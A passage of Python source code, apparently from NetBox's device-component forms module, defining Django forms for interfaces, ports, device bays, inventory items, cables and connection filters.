except Device.DoesNotExist:
device = None
if device:
self.fields['power_port'].queryset = PowerPort.objects.filter(
device__in=[device, device.get_vc_master()]
)
else:
self.fields['power_port'].queryset = PowerPort.objects.none()
#
# Interfaces
#
class InterfaceFilterForm(DeviceComponentFilterForm):
model = Interface
type = forms.MultipleChoiceField(
choices=InterfaceTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
enabled = forms.NullBooleanField(
required=False,
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
mac_address = forms.CharField(
required=False,
label='MAC address'
)
tag = TagFilterField(model)
class InterfaceForm(BootstrapMixin, InterfaceCommonForm, forms.ModelForm):
untagged_vlan = DynamicModelChoiceField(
queryset=VLAN.objects.all(),
required=False,
label='Untagged VLAN',
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
tagged_vlans = DynamicModelMultipleChoiceField(
queryset=VLAN.objects.all(),
required=False,
label='Tagged VLANs',
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Interface
fields = [
'device', 'name', 'label', 'type', 'enabled', 'lag', 'mac_address', 'mtu', 'mgmt_only', 'description',
'mode', 'untagged_vlan', 'tagged_vlans', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
'type': StaticSelect2(),
'lag': StaticSelect2(),
'mode': StaticSelect2(),
}
labels = {
'mode': '802.1Q Mode',
}
help_texts = {
'mode': INTERFACE_MODE_HELP_TEXT,
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.is_bound:
device = Device.objects.get(pk=self.data['device'])
else:
device = self.instance.device
# Limit LAG choices to interfaces belonging to this device or a peer VC member
device_query = Q(device=device)
if device.virtual_chassis:
device_query |= Q(device__virtual_chassis=device.virtual_chassis)
self.fields['lag'].queryset = Interface.objects.filter(
device_query,
type=InterfaceTypeChoices.TYPE_LAG
).exclude(pk=self.instance.pk)
# Add current site to VLANs query params
self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
class InterfaceCreateForm(ComponentCreateForm, InterfaceCommonForm):
type = forms.ChoiceField(
choices=InterfaceTypeChoices,
widget=StaticSelect2(),
)
enabled = forms.BooleanField(
required=False,
initial=True
)
lag = forms.ModelChoiceField(
queryset=Interface.objects.all(),
required=False,
label='Parent LAG',
widget=StaticSelect2(),
)
mtu = forms.IntegerField(
required=False,
min_value=INTERFACE_MTU_MIN,
max_value=INTERFACE_MTU_MAX,
label='MTU'
)
mac_address = forms.CharField(
required=False,
label='MAC Address'
)
mgmt_only = forms.BooleanField(
required=False,
label='Management only',
help_text='This interface is used only for out-of-band management'
)
mode = forms.ChoiceField(
choices=add_blank_choice(InterfaceModeChoices),
required=False,
widget=StaticSelect2(),
)
untagged_vlan = DynamicModelChoiceField(
queryset=VLAN.objects.all(),
required=False,
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
tagged_vlans = DynamicModelMultipleChoiceField(
queryset=VLAN.objects.all(),
required=False,
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
field_order = (
'device', 'name_pattern', 'label_pattern', 'type', 'enabled', 'lag', 'mtu', 'mac_address', 'description',
'mgmt_only', 'mode', 'untagged_vlan', 'tagged_vlans', 'tags'
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit LAG choices to interfaces belonging to this device or a peer VC member
device = Device.objects.get(
pk=self.initial.get('device') or self.data.get('device')
)
device_query = Q(device=device)
if device.virtual_chassis:
device_query |= Q(device__virtual_chassis=device.virtual_chassis)
self.fields['lag'].queryset = Interface.objects.filter(device_query, type=InterfaceTypeChoices.TYPE_LAG)
# Add current site to VLANs query params
self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
class InterfaceBulkCreateForm(
form_from_model(Interface, ['type', 'enabled', 'mtu', 'mgmt_only']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'enabled', 'mtu', 'mgmt_only', 'description', 'tags')
class InterfaceBulkEditForm(
form_from_model(Interface, [
'label', 'type', 'lag', 'mac_address', 'mtu', 'description', 'mode'
]),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=Interface.objects.all(),
widget=forms.MultipleHiddenInput()
)
device = forms.ModelChoiceField(
queryset=Device.objects.all(),
required=False,
disabled=True,
widget=forms.HiddenInput()
)
enabled = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect
)
mgmt_only = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect,
label='Management only'
)
untagged_vlan = DynamicModelChoiceField(
queryset=VLAN.objects.all(),
required=False,
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
tagged_vlans = DynamicModelMultipleChoiceField(
queryset=VLAN.objects.all(),
required=False,
display_field='display_name',
brief_mode=False,
query_params={
'site_id': 'null',
}
)
class Meta:
nullable_fields = (
'label', 'lag', 'mac_address', 'mtu', 'description', 'mode', 'untagged_vlan', 'tagged_vlans'
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit LAG choices to interfaces which belong to the parent device (or VC master)
if 'device' in self.initial:
device = Device.objects.filter(pk=self.initial['device']).first()
self.fields['lag'].queryset = Interface.objects.filter(
device__in=[device, device.get_vc_master()],
type=InterfaceTypeChoices.TYPE_LAG
)
# Add current site to VLANs query params
self.fields['untagged_vlan'].widget.add_query_param('site_id', device.site.pk)
self.fields['tagged_vlans'].widget.add_query_param('site_id', device.site.pk)
else:
# See 4523
if 'pk' in self.initial:
site = None
interfaces = Interface.objects.filter(pk__in=self.initial['pk']).prefetch_related('device__site')
# Check interface sites. First interface should set site, further interfaces will either continue the
# loop or reset back to no site and break the loop.
for interface in interfaces:
if site is None:
site = interface.device.site
elif interface.device.site is not site:
site = None
break
if site is not None:
self.fields['untagged_vlan'].widget.add_query_param('site_id', site.pk)
self.fields['tagged_vlans'].widget.add_query_param('site_id', site.pk)
self.fields['lag'].choices = ()
self.fields['lag'].widget.attrs['disabled'] = True
def clean(self):
super().clean()
# Untagged interfaces cannot be assigned tagged VLANs
if self.cleaned_data['mode'] == InterfaceModeChoices.MODE_ACCESS and self.cleaned_data['tagged_vlans']:
raise forms.ValidationError({
'mode': "An access interface cannot have tagged VLANs assigned."
})
# Remove all tagged VLAN assignments from "tagged all" interfaces
elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED_ALL:
self.cleaned_data['tagged_vlans'] = []
class InterfaceCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
lag = CSVModelChoiceField(
queryset=Interface.objects.all(),
required=False,
to_field_name='name',
help_text='Parent LAG interface'
)
type = CSVChoiceField(
choices=InterfaceTypeChoices,
help_text='Physical medium'
)
mode = CSVChoiceField(
choices=InterfaceModeChoices,
required=False,
help_text='IEEE 802.1Q operational mode (for L2 interfaces)'
)
class Meta:
model = Interface
fields = Interface.csv_headers
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit LAG choices to interfaces belonging to this device (or virtual chassis)
device = None
if self.is_bound and 'device' in self.data:
try:
device = self.fields['device'].to_python(self.data['device'])
except forms.ValidationError:
pass
if device and device.virtual_chassis:
self.fields['lag'].queryset = Interface.objects.filter(
Q(device=device) | Q(device__virtual_chassis=device.virtual_chassis),
type=InterfaceTypeChoices.TYPE_LAG
)
elif device:
self.fields['lag'].queryset = Interface.objects.filter(
device=device,
type=InterfaceTypeChoices.TYPE_LAG
)
else:
self.fields['lag'].queryset = Interface.objects.none()
def clean_enabled(self):
# Make sure enabled is True when it's not included in the uploaded data
if 'enabled' not in self.data:
return True
else:
return self.cleaned_data['enabled']
#
# Front pass-through ports
#
class FrontPortFilterForm(DeviceComponentFilterForm):
model = FrontPort
type = forms.MultipleChoiceField(
choices=PortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class FrontPortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = FrontPort
fields = [
'device', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
'type': StaticSelect2(),
'rear_port': StaticSelect2(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit RearPort choices to the local device
if hasattr(self.instance, 'device'):
self.fields['rear_port'].queryset = self.fields['rear_port'].queryset.filter(
device=self.instance.device
)
# TODO: Merge with FrontPortTemplateCreateForm to remove duplicate logic
class FrontPortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=PortTypeChoices,
widget=StaticSelect2(),
)
rear_port_set = forms.MultipleChoiceField(
choices=[],
label='Rear ports',
help_text='Select one rear port assignment for each front port being created.',
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'rear_port_set', 'description', 'tags')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
device = Device.objects.get(
pk=self.initial.get('device') or self.data.get('device')
)
# Determine which rear port positions are occupied. These will be excluded from the list of available
# mappings.
occupied_port_positions = [
(front_port.rear_port_id, front_port.rear_port_position)
for front_port in device.frontports.all()
]
# Populate rear port choices
choices = []
rear_ports = RearPort.objects.filter(device=device)
for rear_port in rear_ports:
for i in range(1, rear_port.positions + 1):
if (rear_port.pk, i) not in occupied_port_positions:
choices.append(
('{}:{}'.format(rear_port.pk, i), '{}:{}'.format(rear_port.name, i))
)
self.fields['rear_port_set'].choices = choices
def clean(self):
super().clean()
# Validate that the number of ports being created equals the number of selected (rear port, position) tuples
front_port_count = len(self.cleaned_data['name_pattern'])
rear_port_count = len(self.cleaned_data['rear_port_set'])
if front_port_count != rear_port_count:
raise forms.ValidationError({
'rear_port_set': 'The provided name pattern will create {} ports, however {} rear port assignments '
'were selected. These counts must match.'.format(front_port_count, rear_port_count)
})
def get_iterative_data(self, iteration):
# Assign rear port and position from selected set
rear_port, position = self.cleaned_data['rear_port_set'][iteration].split(':')
return {
'rear_port': int(rear_port),
'rear_port_position': int(position),
}
# class FrontPortBulkCreateForm(
# form_from_model(FrontPort, ['label', 'type', 'description', 'tags']),
# DeviceBulkAddComponentForm
# ):
# pass
class FrontPortBulkEditForm(
form_from_model(FrontPort, ['label', 'type', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=FrontPort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class FrontPortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
rear_port = CSVModelChoiceField(
queryset=RearPort.objects.all(),
to_field_name='name',
help_text='Corresponding rear port'
)
type = CSVChoiceField(
choices=PortTypeChoices,
help_text='Physical medium classification'
)
class Meta:
model = FrontPort
fields = FrontPort.csv_headers
help_texts = {
'rear_port_position': 'Mapped position on corresponding rear port',
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit RearPort choices to those belonging to this device (or VC master)
if self.is_bound:
try:
device = self.fields['device'].to_python(self.data['device'])
except forms.ValidationError:
device = None
else:
try:
device = self.instance.device
except Device.DoesNotExist:
device = None
if device:
self.fields['rear_port'].queryset = RearPort.objects.filter(
device__in=[device, device.get_vc_master()]
)
else:
self.fields['rear_port'].queryset = RearPort.objects.none()
#
# Rear pass-through ports
#
class RearPortFilterForm(DeviceComponentFilterForm):
model = RearPort
type = forms.MultipleChoiceField(
choices=PortTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
tag = TagFilterField(model)
class RearPortForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = RearPort
fields = [
'device', 'name', 'label', 'type', 'positions', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
'type': StaticSelect2(),
}
class RearPortCreateForm(ComponentCreateForm):
type = forms.ChoiceField(
choices=PortTypeChoices,
widget=StaticSelect2(),
)
positions = forms.IntegerField(
min_value=REARPORT_POSITIONS_MIN,
max_value=REARPORT_POSITIONS_MAX,
initial=1,
help_text='The number of front ports which may be mapped to each rear port'
)
field_order = ('device', 'name_pattern', 'label_pattern', 'type', 'positions', 'description', 'tags')
class RearPortBulkCreateForm(
form_from_model(RearPort, ['type', 'positions']),
DeviceBulkAddComponentForm
):
field_order = ('name_pattern', 'label_pattern', 'type', 'positions', 'description', 'tags')
class RearPortBulkEditForm(
form_from_model(RearPort, ['label', 'type', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=RearPort.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class RearPortCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
type = CSVChoiceField(
help_text='Physical medium classification',
choices=PortTypeChoices,
)
class Meta:
model = RearPort
fields = RearPort.csv_headers
help_texts = {
'positions': 'Number of front ports which may be mapped'
}
#
# Device bays
#
class DeviceBayFilterForm(DeviceComponentFilterForm):
model = DeviceBay
tag = TagFilterField(model)
class DeviceBayForm(BootstrapMixin, forms.ModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = DeviceBay
fields = [
'device', 'name', 'label', 'description', 'tags',
]
widgets = {
'device': forms.HiddenInput(),
}
class DeviceBayCreateForm(ComponentCreateForm):
field_order = ('device', 'name_pattern', 'label_pattern', 'description', 'tags')
class PopulateDeviceBayForm(BootstrapMixin, forms.Form):
installed_device = forms.ModelChoiceField(
queryset=Device.objects.all(),
label='Child Device',
help_text="Child devices must first be created and assigned to the site/rack of the parent device.",
widget=StaticSelect2(),
)
def __init__(self, device_bay, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['installed_device'].queryset = Device.objects.filter(
site=device_bay.device.site,
rack=device_bay.device.rack,
parent_bay__isnull=True,
device_type__u_height=0,
device_type__subdevice_role=SubdeviceRoleChoices.ROLE_CHILD
).exclude(pk=device_bay.device.pk)
class DeviceBayBulkCreateForm(DeviceBulkAddComponentForm):
field_order = ('name_pattern', 'label_pattern', 'description', 'tags')
class DeviceBayBulkEditForm(
form_from_model(DeviceBay, ['label', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=DeviceBay.objects.all(),
widget=forms.MultipleHiddenInput()
)
class Meta:
nullable_fields = ('label', 'description')
class DeviceBayCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
installed_device = CSVModelChoiceField(
queryset=Device.objects.all(),
required=False,
to_field_name='name',
help_text='Child device installed within this bay',
error_messages={
'invalid_choice': 'Child device not found.',
}
)
class Meta:
model = DeviceBay
fields = DeviceBay.csv_headers
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit installed device choices to devices of the correct type and location
if self.is_bound:
try:
device = self.fields['device'].to_python(self.data['device'])
except forms.ValidationError:
device = None
else:
try:
device = self.instance.device
except Device.DoesNotExist:
device = None
if device:
self.fields['installed_device'].queryset = Device.objects.filter(
site=device.site,
rack=device.rack,
parent_bay__isnull=True,
device_type__u_height=0,
device_type__subdevice_role=SubdeviceRoleChoices.ROLE_CHILD
).exclude(pk=device.pk)
else:
self.fields['installed_device'].queryset = Interface.objects.none()
#
# Inventory items
#
class InventoryItemForm(BootstrapMixin, forms.ModelForm):
device = DynamicModelChoiceField(
queryset=Device.objects.all(),
display_field='display_name'
)
parent = DynamicModelChoiceField(
queryset=InventoryItem.objects.all(),
required=False,
query_params={
'device_id': '$device'
}
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = InventoryItem
fields = [
'device', 'parent', 'name', 'label', 'manufacturer', 'part_id', 'serial', 'asset_tag', 'description',
'tags',
]
class InventoryItemCreateForm(ComponentCreateForm):
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
parent = DynamicModelChoiceField(
queryset=InventoryItem.objects.all(),
required=False,
query_params={
'device_id': '$device'
}
)
part_id = forms.CharField(
max_length=50,
required=False,
label='Part ID'
)
serial = forms.CharField(
max_length=50,
required=False,
)
asset_tag = forms.CharField(
max_length=50,
required=False,
)
field_order = (
'device', 'parent', 'name_pattern', 'label_pattern', 'manufacturer', 'part_id', 'serial', 'asset_tag',
'description', 'tags',
)
class InventoryItemCSVForm(CSVModelForm):
device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name'
)
manufacturer = CSVModelChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='name',
required=False
)
class Meta:
model = InventoryItem
fields = InventoryItem.csv_headers
class InventoryItemBulkCreateForm(
form_from_model(InventoryItem, ['manufacturer', 'part_id', 'serial', 'asset_tag', 'discovered']),
DeviceBulkAddComponentForm
):
field_order = (
'name_pattern', 'label_pattern', 'manufacturer', 'part_id', 'serial', 'asset_tag', 'discovered', 'description',
'tags',
)
class InventoryItemBulkEditForm(
form_from_model(InventoryItem, ['label', 'manufacturer', 'part_id', 'description']),
BootstrapMixin,
AddRemoveTagsForm,
BulkEditForm
):
pk = forms.ModelMultipleChoiceField(
queryset=InventoryItem.objects.all(),
widget=forms.MultipleHiddenInput()
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
class Meta:
nullable_fields = ('label', 'manufacturer', 'part_id', 'description')
class InventoryItemFilterForm(DeviceComponentFilterForm):
model = InventoryItem
manufacturer = DynamicModelMultipleChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='slug',
required=False
)
serial = forms.CharField(
required=False
)
asset_tag = forms.CharField(
required=False
)
discovered = forms.NullBooleanField(
required=False,
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
tag = TagFilterField(model)
#
# Cables
#
class ConnectCableToDeviceForm(BootstrapMixin, CustomFieldModelForm):
"""
Base form for connecting a Cable to a Device component
"""
termination_b_region = DynamicModelChoiceField(
queryset=Region.objects.all(),
label='Region',
required=False
)
termination_b_site = DynamicModelChoiceField(
queryset=Site.objects.all(),
label='Site',
required=False,
query_params={
'region_id': '$termination_b_region'
}
)
termination_b_rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
label='Rack',
required=False,
display_field='display_name',
null_option='None',
query_params={
'site_id': '$termination_b_site'
}
)
termination_b_device = DynamicModelChoiceField(
queryset=Device.objects.all(),
label='Device',
required=False,
display_field='display_name',
query_params={
'site_id': '$termination_b_site',
'rack_id': '$termination_b_rack',
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Cable
fields = [
'termination_b_region', 'termination_b_site', 'termination_b_rack', 'termination_b_device',
'termination_b_id', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
]
widgets = {
'status': StaticSelect2,
'type': StaticSelect2,
'length_unit': StaticSelect2,
}
def clean_termination_b_id(self):
# Return the PK rather than the object
return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class ConnectCableToConsolePortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=ConsolePort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToConsoleServerPortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=ConsoleServerPort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToPowerPortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=PowerPort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToPowerOutletForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=PowerOutlet.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToInterfaceForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=Interface.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device',
'kind': 'physical',
}
)
class ConnectCableToFrontPortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=FrontPort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToRearPortForm(ConnectCableToDeviceForm):
termination_b_id = DynamicModelChoiceField(
queryset=RearPort.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'device_id': '$termination_b_device'
}
)
class ConnectCableToCircuitTerminationForm(BootstrapMixin, CustomFieldModelForm):
termination_b_provider = DynamicModelChoiceField(
queryset=Provider.objects.all(),
label='Provider',
required=False
)
termination_b_region = DynamicModelChoiceField(
queryset=Region.objects.all(),
label='Region',
required=False
)
termination_b_site = DynamicModelChoiceField(
queryset=Site.objects.all(),
label='Site',
required=False,
query_params={
'region_id': '$termination_b_region'
}
)
termination_b_circuit = DynamicModelChoiceField(
queryset=Circuit.objects.all(),
label='Circuit',
display_field='cid',
query_params={
'provider_id': '$termination_b_provider',
'site_id': '$termination_b_site',
}
)
termination_b_id = DynamicModelChoiceField(
queryset=CircuitTermination.objects.all(),
label='Side',
display_field='term_side',
disabled_indicator='cable',
query_params={
'circuit_id': '$termination_b_circuit'
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Cable
fields = [
'termination_b_provider', 'termination_b_region', 'termination_b_site', 'termination_b_circuit',
'termination_b_id', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
]
def clean_termination_b_id(self):
# Return the PK rather than the object
return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class ConnectCableToPowerFeedForm(BootstrapMixin, CustomFieldModelForm):
termination_b_region = DynamicModelChoiceField(
queryset=Region.objects.all(),
label='Region',
required=False
)
termination_b_site = DynamicModelChoiceField(
queryset=Site.objects.all(),
label='Site',
required=False,
query_params={
'region_id': '$termination_b_region'
}
)
termination_b_rackgroup = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
label='Rack Group',
required=False,
display_field='cid',
query_params={
'site_id': '$termination_b_site'
}
)
termination_b_powerpanel = DynamicModelChoiceField(
queryset=PowerPanel.objects.all(),
label='Power Panel',
required=False,
query_params={
'site_id': '$termination_b_site',
'rack_group_id': '$termination_b_rackgroup',
}
)
termination_b_id = DynamicModelChoiceField(
queryset=PowerFeed.objects.all(),
label='Name',
disabled_indicator='cable',
query_params={
'power_panel_id': '$termination_b_powerpanel'
}
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Cable
fields = [
'termination_b_rackgroup', 'termination_b_powerpanel', 'termination_b_id', 'type', 'status', 'label',
'color', 'length', 'length_unit', 'tags',
]
def clean_termination_b_id(self):
# Return the PK rather than the object
return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class CableForm(BootstrapMixin, CustomFieldModelForm):
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Cable
fields = [
'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
]
widgets = {
'status': StaticSelect2,
'type': StaticSelect2,
'length_unit': StaticSelect2,
}
error_messages = {
'length': {
'max_value': 'Maximum length is 32767 (any unit)'
}
}
class CableCSVForm(CustomFieldModelCSVForm):
# Termination A
side_a_device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
help_text='Side A device'
)
side_a_type = CSVContentTypeField(
queryset=ContentType.objects.all(),
limit_choices_to=CABLE_TERMINATION_MODELS,
help_text='Side A type'
)
side_a_name = forms.CharField(
help_text='Side A component name'
)
# Termination B
side_b_device = CSVModelChoiceField(
queryset=Device.objects.all(),
to_field_name='name',
help_text='Side B device'
)
side_b_type = CSVContentTypeField(
queryset=ContentType.objects.all(),
limit_choices_to=CABLE_TERMINATION_MODELS,
help_text='Side B type'
)
side_b_name = forms.CharField(
help_text='Side B component name'
)
# Cable attributes
status = CSVChoiceField(
choices=CableStatusChoices,
required=False,
help_text='Connection status'
)
type = CSVChoiceField(
choices=CableTypeChoices,
required=False,
help_text='Physical medium classification'
)
length_unit = CSVChoiceField(
choices=CableLengthUnitChoices,
required=False,
help_text='Length unit'
)
class Meta:
model = Cable
fields = [
'side_a_device', 'side_a_type', 'side_a_name', 'side_b_device', 'side_b_type', 'side_b_name', 'type',
'status', 'label', 'color', 'length', 'length_unit',
]
help_texts = {
'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
}
def _clean_side(self, side):
"""
Derive a Cable's A/B termination objects.
:param side: 'a' or 'b'
"""
assert side in 'ab', f"Invalid side designation: {side}"
device = self.cleaned_data.get(f'side_{side}_device')
content_type = self.cleaned_data.get(f'side_{side}_type')
name = self.cleaned_data.get(f'side_{side}_name')
if not device or not content_type or not name:
return None
model = content_type.model_class()
try:
termination_object = model.objects.get(device=device, name=name)
if termination_object.cable is not None:
raise forms.ValidationError(f"Side {side.upper()}: {device} {termination_object} is already connected")
except ObjectDoesNotExist:
raise forms.ValidationError(f"{side.upper()} side termination not found: {device} {name}")
setattr(self.instance, f'termination_{side}', termination_object)
return termination_object
def clean_side_a_name(self):
return self._clean_side('a')
def clean_side_b_name(self):
return self._clean_side('b')
def clean_length_unit(self):
# Avoid trying to save as NULL
length_unit = self.cleaned_data.get('length_unit', None)
return length_unit if length_unit is not None else ''
class CableBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Cable.objects.all(),
widget=forms.MultipleHiddenInput
)
type = forms.ChoiceField(
choices=add_blank_choice(CableTypeChoices),
required=False,
initial='',
widget=StaticSelect2()
)
status = forms.ChoiceField(
choices=add_blank_choice(CableStatusChoices),
required=False,
widget=StaticSelect2(),
initial=''
)
label = forms.CharField(
max_length=100,
required=False
)
color = forms.CharField(
max_length=6, # RGB color code
required=False,
widget=ColorSelect()
)
length = forms.IntegerField(
min_value=1,
required=False
)
length_unit = forms.ChoiceField(
choices=add_blank_choice(CableLengthUnitChoices),
required=False,
initial='',
widget=StaticSelect2()
)
class Meta:
nullable_fields = [
'type', 'status', 'label', 'color', 'length',
]
def clean(self):
super().clean()
# Validate length/unit
length = self.cleaned_data.get('length')
length_unit = self.cleaned_data.get('length_unit')
if length and not length_unit:
raise forms.ValidationError({
'length_unit': "Must specify a unit when setting length"
})
class CableFilterForm(BootstrapMixin, forms.Form):
model = Cable
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
tenant = DynamicModelMultipleChoiceField(
queryset=Tenant.objects.all(),
to_field_name='slug',
required=False
)
rack_id = DynamicModelMultipleChoiceField(
queryset=Rack.objects.all(),
required=False,
label='Rack',
null_option='None',
query_params={
'site': '$site'
}
)
type = forms.MultipleChoiceField(
choices=add_blank_choice(CableTypeChoices),
required=False,
widget=StaticSelect2()
)
status = forms.ChoiceField(
required=False,
choices=add_blank_choice(CableStatusChoices),
widget=StaticSelect2()
)
color = forms.CharField(
max_length=6, # RGB color code
required=False,
widget=ColorSelect()
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site',
'tenant': '$tenant',
'rack_id': '$rack_id',
}
)
tag = TagFilterField(model)
#
# Connections
#
class ConsoleConnectionFilterForm(BootstrapMixin, forms.Form):
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site'
}
)
class PowerConnectionFilterForm(BootstrapMixin, forms.Form):
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site'
}
)
class InterfaceConnectionFilterForm(BootstrapMixin, forms.Form):
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site'
}
)
#
# Virtual chassis
#
class DeviceSelectionForm(forms.Form):
pk = forms.ModelMultipleChoiceField(
queryset=Device.objects.all(),
widget=forms.MultipleHiddenInput()
)
class VirtualChassisCreateForm(BootstrapMixin, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
